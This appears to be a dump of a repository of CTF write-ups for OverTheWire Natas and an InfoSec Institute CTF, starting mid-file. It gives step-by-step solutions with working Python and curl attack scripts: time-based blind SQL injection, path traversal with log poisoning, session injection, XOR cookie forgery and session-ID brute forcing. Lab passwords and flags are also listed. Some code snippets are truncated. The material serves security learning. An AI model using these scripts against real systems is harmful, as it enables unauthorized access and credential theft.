66 | http://ctf.infosecinstitute.com/ctf2/ex8_assets/img/duck_43ed2fd0.jpg
67 |
68 | We should see a rubber duck. Why we should not be able in accessing out
69 | fake image (f737c5cf_script.js.png)? Let's try with
70 |
71 | http://ctf.infosecinstitute.com/ctf2/ex8_assets/img/f737c5cf_script.js.png
72 |
73 | It works, but we receive the browser error
74 |
75 | The image "http://ctf.infosecinstitute.com/ctf2/ex8_assets/img/f737c5cf_script.js.png"
76 | cannot be displayed, because it contains errors.
77 |
78 | We should be near the solution...
79 |
80 | 7. After some attempts, I found this. If we add an extension to the URL
81 |
82 | http://ctf.infosecinstitute.com/ctf2/ex8_assets/img/f737c5cf_script.js.png.xyz
83 | ^^^
84 |
85 | We're redirected to
86 |
87 | http://ctf.infosecinstitute.com/ctf2/exercises/ex8.php?file=f737c5cf_script.js.png.xyz
88 | ^^^^
89 |
90 | As we can see, a new parameter appeared (`file`). Let's try in removing the
91 | `.xyz` suffix
92 |
93 | http://ctf.infosecinstitute.com/ctf2/exercises/ex8.php?file=f737c5cf_script.js.png
94 |
95 | We'll receive
96 |
97 | Your file does not contain the right code
98 |
99 | Mmmm... seems that the code that we wrote is not good. Let's try in doing this
100 |
101 | $ echo "" > f737c5cf_script.js.jpg
102 |
103 | Then, upload the `f737c5cf_script.js.jpg` file. After that, try visiting
104 |
105 | http://ctf.infosecinstitute.com/ctf2/exercises/ex8.php?file=f737c5cf_script.js.jpg
106 |
107 | Yep!
108 |
109 | Hehe, we hope that didn't took you long. Expect a redirect in the usual time.
110 |
111 | [Go to Ex7](./ex7.md) | [Go to Ex9](./ex9.md)
112 |
113 |
--------------------------------------------------------------------------------
/overthewire/natas/natas20.md:
--------------------------------------------------------------------------------
1 | # Natas20
2 |
3 | * user: `natas20`
4 | * pass: `eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF`
5 | * url: [http://natas20.natas.labs.overthewire.org](http://natas20:eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF@natas20.natas.labs.overthewire.org)
6 | * flag: `IFekPyrQXftziDEsUr3x21sYuahypdgJ`
7 |
8 | ## Procedure
9 |
10 | 1. In this level it's realistic to say that session ID cannot be predicted.
11 | Indeed, it seems to be totally random.
12 |
13 | 2. By taking a look in the source code, we can see that custom handlers for
14 | session storing management were defined. In our case the intersing ones are
15 | `myread()` and `mywrite()`.
16 |
17 | 3. In `myread()` we can see that session file's content is split by using
18 | `\n` (newline) as separator character.
19 |
20 | $_SESSION = array();
21 | foreach(explode("\n", $data) as $line) {
22 | debug("Read [$line]");
23 | ...
24 | }
25 |
26 | Furthermore, to fill the `$_SESSION` array, each line is expected to be in
27 | the form `key value`
28 |
29 | $_SESSION = array();
30 | foreach(explode("\n", $data) as $line) {
31 | ...
32 | $parts = explode(" ", $line, 2);
33 | if($parts[0] != "")
34 | $_SESSION[$parts[0]] = $parts[1];
35 | }
36 |
37 | 4. To get authenticated as `admin`, page checks if session contains the `admin`
38 | key and if its value in `1`.
39 |
40 | function print_credentials() { /* {{{ */
41 | if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
42 | print "You are an admin. The credentials for the next level are: ";
43 | print "
Username: natas21\n";
44 | print "Password:
";
45 | } else {
46 | print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas21.";
47 | }
48 | }
49 |
50 | 5. When parameter called `name` is posted, a new session is initialised and
51 | value of `name` is stored on it (without being sanitised!!!).
52 |
53 | 6. Few lines of Python ([natas20.py](./scripts/natas20.py)) will do the attack
54 |
55 | import requests
56 |
57 | target = 'http://natas20.natas.labs.overthewire.org'
58 | auth = ('natas20', 'eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF')
59 |
60 | print "#"
61 | print "# FIRST REQUEST"
62 | print "#"
63 | params = dict(name='admin\nadmin 1', debug='') # <-- this is the key part
64 | # ^^^^^^^^^^^^^^^^^^^^^
65 | cookies = dict()
66 | r = requests.get(target, auth=auth, params=params, cookies=cookies)
67 | phpsessid = r.cookies['PHPSESSID']
68 | print r.text
69 |
70 | print "\n\n"
71 | print "#"
72 | print "# SECOND REQUEST"
73 | print "#"
74 | params = dict(debug='')
75 | cookies = dict(PHPSESSID=phpsessid)
76 | r = requests.get(target, auth=auth, params=params, cookies=cookies)
77 | print r.text
78 |
79 | In practice, we'll inject the `admin` parameter via the `name` parameter.
80 |
81 | $ pyton natas20.py
82 | #
83 | # FIRST REQUEST
84 | #
85 |
86 |
87 | [cut]
88 |
89 |
90 |
natas20
91 |
92 | DEBUG: MYREAD 3ja0006ku6rh8birk8i66nlrr5 DEBUG: Session file doesn't exist DEBUG: Name set to admin
93 | admin 1 You are logged in as a regular user. Login as an admin to retrieve credentials for natas21.
94 |
95 | [cut]
96 |
97 | DEBUG: MYWRITE 3ja0006ku6rh8birk8i66nlrr5 name|s:13:"admin
98 | admin 1"; DEBUG: Saving in /var/lib/php5/mysess_3ja0006ku6rh8birk8i66nlrr5 DEBUG: name => admin
99 | admin 1
100 |
101 | #
102 | # SECOND REQUEST
103 | #
104 |
105 |
106 | [cut]
107 |
108 |
109 |
natas20
110 |
111 | DEBUG: MYREAD 3ja0006ku6rh8birk8i66nlrr5 DEBUG: Reading from /var/lib/php5/mysess_3ja0006ku6rh8birk8i66nlrr5 DEBUG: Read [name admin] DEBUG: Read [admin 1] DEBUG: Read [] You are an admin. The credentials for the next level are:
113 |
114 | [cut]
115 |
116 |
117 |
118 |
--------------------------------------------------------------------------------
/overthewire/natas/natas11.md:
--------------------------------------------------------------------------------
1 | # Natas11
2 |
3 | * user: `natas11`
4 | * pass: `nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu`
5 | * url: `http://natas11.natas.labs.overthewire.org`
6 | * flag: `EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3`
7 |
8 | ## Procedure
9 |
10 | 1. The hint *Cookies are protected with XOR encryption* is clear. We have to
11 | force an XOR-based encryption. From the theory, if `text ^ key = enc` then
12 | `enc ^ text = key`.
13 |
14 | 2. By sniffing, we can get a cookie called `data` with the following content
15 |
16 | ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV56QUcIaAw=
17 |
18 | Furthermore, by taking a look in the source code, there is the XOR-base
19 | encryption function
20 |
21 | function xor_encrypt($in) {
22 | $key = '';
23 | $text = $in;
24 | $outText = '';
25 | // Iterate through each character
26 | for($i=0;$i"no", "bgcolor"=>"#ffffff" );
62 | $mydata_json = json_encode($mydata);
63 | $mydata_enc = xor_encrypt_2($mydata_json);
64 | echo $mydata_enc;
65 | ?>
66 |
67 | The result should be
68 |
69 | $ php myscript.php
70 | qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8'!nJq
71 |
72 | It seems to be a repetition of string `qw8J`. It should be the key...
73 |
74 | 4. Create a new function like this
75 |
76 | function xor_encrypt_2($in) {
77 | //$key = base64_decode("ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV56QUcIaAw=");
78 | $key = "qw8J";
79 | $text = $in;
80 | $outText = '';
81 |
82 | // Iterate through each character
83 | for($i=0;$i"yes", "bgcolor"=>"#ffffff" );
106 | $mydata_json = json_encode($mydata);
107 | $mydata_enc = xor_encrypt_2($mydata_json);
108 | $mydata_b64 = base64_encode($mydata_enc);
109 | echo $mydata_b64;
110 | ?>
111 |
112 | is should return
113 |
114 | $ php myscript.php
115 | ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
116 |
117 | 5. Well, let's try to use it as cookie
118 |
119 | $ curl -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK -b data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK http://natas11.natas.labs.overthewire.org
120 |
121 |
122 | [cut]
123 |
124 |
natas11
125 |
126 |
127 | Cookies are protected with XOR encryption
128 |
129 | The password for natas12 is EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
130 |
131 | [cut]
132 |
133 |
134 |
--------------------------------------------------------------------------------
/overthewire/natas/natas19.md:
--------------------------------------------------------------------------------
1 | # Natas19
2 |
3 | * user: `natas19`
4 | * pass: `4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs`
5 | * url: `http://natas19.natas.labs.overthewire.org`
6 | * flag: `eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF`
7 |
8 | ## Procedure
9 |
10 | 1. Since values of PHPSESSID are not sequential, we have to try if it's
11 | possible to evaluate the randomness in order to predict values. To do that
12 | we need a significant number of generated PHPSESSID and the try to execute
13 | some statistics.
14 |
15 | 2. Statistics are executed by Python script
16 | [natas19_stats.py](./scripts/natas19_stats.py). Run it
17 |
18 | $ python natas19_stats.py
19 | Just a simple analysis:
20 | PHPSESSIDs with 18 chars: 82.00%
21 | PHPSESSIDs with 14 chars: 2.00%
22 | PHPSESSIDs with 16 chars: 14.00%
23 |
24 | Chose length: 18
25 |
26 | With 300 captures
27 | char at position 0 of PHPSESSID is '3' with accurancy 100.00%
28 | char at position 1 of PHPSESSID is '1' with accurancy 20.00%
29 | char at position 2 of PHPSESSID is '3' with accurancy 100.00%
30 | char at position 3 of PHPSESSID is '2' with accurancy 14.00%
31 | char at position 4 of PHPSESSID is '3' with accurancy 100.00%
32 | char at position 5 of PHPSESSID is '3' with accurancy 13.00%
33 | char at position 6 of PHPSESSID is '2' with accurancy 100.00%
34 | char at position 7 of PHPSESSID is 'd' with accurancy 100.00%
35 | char at position 8 of PHPSESSID is '6' with accurancy 100.00%
36 | char at position 9 of PHPSESSID is '1' with accurancy 100.00%
37 | char at position 10 of PHPSESSID is '6' with accurancy 100.00%
38 | char at position 11 of PHPSESSID is '4' with accurancy 100.00%
39 | char at position 12 of PHPSESSID is '6' with accurancy 100.00%
40 | char at position 13 of PHPSESSID is 'd' with accurancy 100.00%
41 | char at position 14 of PHPSESSID is '6' with accurancy 100.00%
42 | char at position 15 of PHPSESSID is '9' with accurancy 100.00%
43 | char at position 16 of PHPSESSID is '6' with accurancy 100.00%
44 | char at position 17 of PHPSESSID is 'e' with accurancy 100.00%
45 |
46 | The output inform us that 82% of the captures is 18 chars length, so it's
47 | a good candidate for our flag. Then, by considering only IDs with 18 chars,
48 | we have an evaluation of the characters. According to the statistics, our
49 | PHPSESSID should be like this:
50 |
51 | 3 [?] 3 [?] 3 [?] 2d61646d696e
52 |
53 | 3. Now we can try with a brute-force because the range of possible solutions
54 | is reasonable (16x16x16).
55 |
56 | while x <= 0xf:
57 | while y <= 0xf:
58 | while z <= 0xf:
59 | phpsessid = (('3%s3%s3%s2d61646d696e') %
60 | (hex(x)[2:], hex(y)[2:], hex(z)[2:]))
61 | cookies['PHPSESSID'] = phpsessid
62 | print 'Trying with: %s' % phpsessid
63 | r = requests.get(target, auth=auth, params=params, cookies=cookies)
64 | if "You are logged in as a regular user." not in r.text:
65 | print r.text
66 | sys.exit(0)
67 | z += 1
68 | y += 1
69 | z = 0x0
70 | x += 1
71 | y = 0x0
72 | z = 0x0
73 |
74 | Also in this case, Python is our best friend...
75 |
76 | $ python natas19.py
77 | Trying with: 3030302d61646d696e
78 | ...
79 | Trying with: 33373f2d61646d696e
80 | Trying with: 3338302d61646d696e
81 | Trying with: 3338312d61646d696e
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
natas19
94 |
95 |
96 |
97 | This page uses mostly the same code as the previous level, but session IDs are no longer sequential...
98 |
99 |
100 | You are an admin. The credentials for the next level are:
15 |
16 | 3. The image seems to be a one pixel image without any relevat info. Let's try
17 | if the URL `http://natas2.natas.labs.overthewire.or/files` give us
18 | something...
19 |
20 | 4. BINGO! The `/files` path is listable and we can see an interesting file
21 | named `users.txt`. Let's try to get its conent...
22 |
23 | $ curl -u natas2:ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi http://natas2.natas.labs.overthewire.org/files/users.txt
24 | # username:password
25 | alice:BYNdCesZqW
26 | bob:jw2ueICLvT
27 | charlie:G5vCxkVV3m
28 | natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
29 | eve:zo4mJWyNj2
30 | mallory:9urtcpzBmH
31 |
--------------------------------------------------------------------------------
/overthewire/natas/scripts/natas25.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | import requests
4 |
5 | target = 'http://natas25.natas.labs.overthewire.org'
6 | auth = ('natas25', 'GHF6X7YwACaYYssHVY05cFq83hRktl4c')
7 |
8 | cookies = dict()
9 | # this forces the application to call logRequest() function
10 | params = dict(lang='natas_webpass')
11 | # this put contents of "/etc/natas_webpass/natas26" in each log entry
12 | headers = {
13 | "User-Agent": ''
14 | }
15 |
16 | # executes a first request to get the session id
17 | r = requests.get(target, auth=auth, params=params, cookies=cookies, headers=headers)
18 | phpsessid=r.cookies['PHPSESSID']
19 | log_file = '/tmp/natas25_%s.log' % phpsessid
20 | cookies = dict(PHPSESSID=phpsessid)
21 |
22 | # "..././" is escaped to "../", we'll exploit it reach log_file
23 | params = dict(lang=('..././..././..././..././..././' + log_file))
24 | r = requests.get(target, auth=auth, params=params, cookies=cookies, headers=headers)
25 | print r.text
26 |
27 |
--------------------------------------------------------------------------------
/overthewire/natas/scripts/natas17.py:
--------------------------------------------------------------------------------
1 | import requests
2 |
3 | pwd_len = 32
4 |
5 | charset_0 = (
6 | '0123456789' +
7 | 'abcdefghijklmnopqrstuvwxyz' +
8 | 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
9 | )
10 | charset_1 = ''
11 |
12 | target = 'http://natas17.natas.labs.overthewire.org'
13 | auth=('natas17','8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')
14 | sleep_time = 15
15 |
16 | for c in charset_0:
17 | username = 'natas18" AND IF(password LIKE BINARY "%%%c%%",SLEEP(%d), 1)#' % (c, sleep_time)
18 | r = requests.get(target, auth=auth, params={"username": username}
19 | )
20 | s = r.elapsed.total_seconds()
21 | if s >= sleep_time:
22 | charset_1 += c
23 | print ('C: ' + charset_1.ljust(len(charset_0), '*'))
24 |
25 | print ""
26 |
27 | password = ""
28 | while len(password) != pwd_len:
29 | for c in charset_1:
30 | t = password + c
31 | username = 'natas18" AND IF(password LIKE BINARY "%s%%",SLEEP(%d), 1)#' % (t, sleep_time)
32 | r = requests.get(target, auth=auth, params={"username": username}
33 | )
34 | s = r.elapsed.total_seconds()
35 | if s >= sleep_time:
36 | print ('P: ' + t.ljust(pwd_len, '*'))
37 | password = t
38 | break
39 |
--------------------------------------------------------------------------------
/overthewire/natas/natas06.md:
--------------------------------------------------------------------------------
1 | # Natas6
2 |
3 | * user: `natas6`
4 | * pass: `aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1`
5 | * url: `http://natas6.natas.labs.overthewire.org`
6 | * flag: `7z3hEENjQtflzgnT29q7wAvMNfZdh0i9`
7 |
8 | ## Procedure
9 |
10 | 1. By clicking on `View sourcecode` a PHP script is shown
11 |
12 | ";
19 | } else {
20 | print "Wrong secret";
21 | }
22 | }
23 | ?>
24 |
25 | 2. The script says that `secret` parameter in the `POST` is checked
26 | against variable `$secret`. Furthermore, file `includes/secret.inc`
27 | is imported. Let's see what it contains
28 |
29 | $ curl -u natas6:aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 http://natas6.natas.labs.overthewire.org/includes/secret.inc
30 |
33 |
34 | 3. Go back to the home page and try to provide the secret
35 | `FOEIUWGHFEEUHOFUOIU`. Bingo!
36 |
37 | Access granted. The password for natas7 is
38 | 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
39 |
--------------------------------------------------------------------------------
/infosec/ctf2/ex11.md:
--------------------------------------------------------------------------------
1 | # Bypassing blacklists
2 |
3 | 1. It seems to be the same of [Level 9](./ex9.md). Anyway, let's take a look
4 | in the cookies
5 |
6 | $ curl -i -s http://ctf.infosecinstitute.com/ctf2/exercises/ex11.php | head -14
7 | HTTP/1.1 200 OK
8 | Date: Tue, 15 Sep 2015 09:03:06 GMT
9 | Server: Apache/2.4.7 (Ubuntu)
10 | X-Powered-By: PHP/5.5.9-1ubuntu4.6
11 | Set-Cookie: PHPSESSID=9f4hc8vgctariqhhndj94dqad7; path=/
12 | Expires: Thu, 19 Nov 1981 08:52:00 GMT
13 | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
14 | Pragma: no-cache
15 | Set-Cookie: welcome=no; expires=Fri, 16-Oct-2015 09:03:06 GMT; Max-Age=2678400; path=/
16 | Vary: Accept-Encoding
17 | Content-Length: 4359
18 | Content-Type: text/html
19 |
20 | More then clear...
21 |
22 | $ curl -i --cookie "welcome=yes" http://ctf.infosecinstitute.com/ctf2/exercises/ex11.php
23 | [...]
24 |